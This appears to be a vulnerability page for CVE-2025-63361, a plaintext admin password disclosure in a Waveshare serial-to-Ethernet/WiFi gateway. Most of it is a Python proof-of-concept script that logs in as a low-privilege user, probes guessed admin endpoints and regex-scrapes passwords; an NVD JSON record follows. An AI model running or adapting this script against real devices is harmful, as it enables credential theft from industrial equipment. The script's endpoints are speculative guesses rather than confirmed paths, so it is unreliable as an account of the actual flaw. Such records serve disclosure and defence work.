CVE-2025-63361

import requests import re # CVE-2025-63361 PoC - Waveshare Gateway Admin Password Disclosure # Target: Waveshare RS232/485 TO WIFI ETH (B) Gateway # Firmware: V3.1.1.0, HW: 4.3.2.1, Webpage: V7.04T.07.002880.0301 TARGET_IP = "192.168.1.100" # Target device IP USERNAME = "low_priv_user" # Low privilege user PASSWORD = "user_password" def exploit_admin_password_disclosure(): """ Exploit for CVE-2025-63361: Admin password disclosure in plaintext This PoC demonstrates how a low-privilege user can view admin password """ base_url = f"http://{TARGET_IP}" # Step 1: Login with low privilege account session = requests.Session() login_data = { "username": USERNAME, "password": PASSWORD } response = session.post(f"{base_url}/login", data=login_data) if response.status_code != 200: print("[-] Login failed") return None print("[+] Logged in with low privilege account") # Step 2: Access admin/user management page to retrieve plaintext password # Common endpoints that may expose admin credentials endpoints = [ "/admin/user_config", "/system/user_management", "/cgi-bin/admin/user_list", "/api/v1/users", "/cgi-bin/get_admin_info" ] admin_password = None for endpoint in endpoints: response = session.get(f"{base_url}{endpoint}") # Search for plaintext password patterns in response password_patterns = [ r'password["\']?\s*[:=]\s*["\']([^"\'\s]+)["\']', r'admin_password["\']?\s*[:=]\s*["\']([^"\'\s]+)["\']', r'pwd["\']?\s*[:=]\s*["\']([^"\'\s]+)["\']', r'value=["\']([^"\'\s]{6,32})["\'][^>]*type=["\']password["\']' ] for pattern in password_patterns: matches = re.findall(pattern, response.text, re.IGNORECASE) if matches: admin_password = matches[0] print(f"[+] Found admin password at {endpoint}: {admin_password}") return admin_password print("[-] Admin password not found in common endpoints") return None if __name__ == "__main__": print("CVE-2025-63361 PoC - Waveshare Gateway Password Disclosure") print("=" * 60) exploit_admin_password_disclosure()

{"cve": {"id": "CVE-2025-63361", "sourceIdentifier": "[email protected]", "published": "2025-12-04T19:16:04.757", "lastModified": "2025-12-15T15:35:06.550", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Waveshare RS232/485 TO WIFI ETH (B) Serial to Ethernet/Wi-Fi Gateway Firmware V3.1.1.0: HW 4.3.2.1: Webpage V7.04T.07.002880.0301 was discovered to render the Administrator password in plaintext."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:N/A:N", "baseScore": 5.7, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.1, "impactScore": 3.6}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-522"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:waveshare:rs232\\/485_to_wifi_eth_\\(b\\)_firmware:3.1.1.0:*:*:*:*:*:*:*", "matchCriteriaId": "F7FD270F-5998-4F41-A80E-8017DF6A142B"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:waveshare:rs232\\/485_to_wifi_eth_\\(b\\):4.3.2.1:*:*:*:*:*:*:*", "matchCriteriaId": "F085A075-48AC-42E4-9BA6-DBB9A8B2935B"}]}]}], "references": [{"url": "https://drive.google.com/file/d/1AGv9KWMTB71NJfIOncuNO6FyK0UAqxmL/view?usp=sharing", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://otsecverse.github.io/OTSecVerse/posts/Post-1/", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}]}}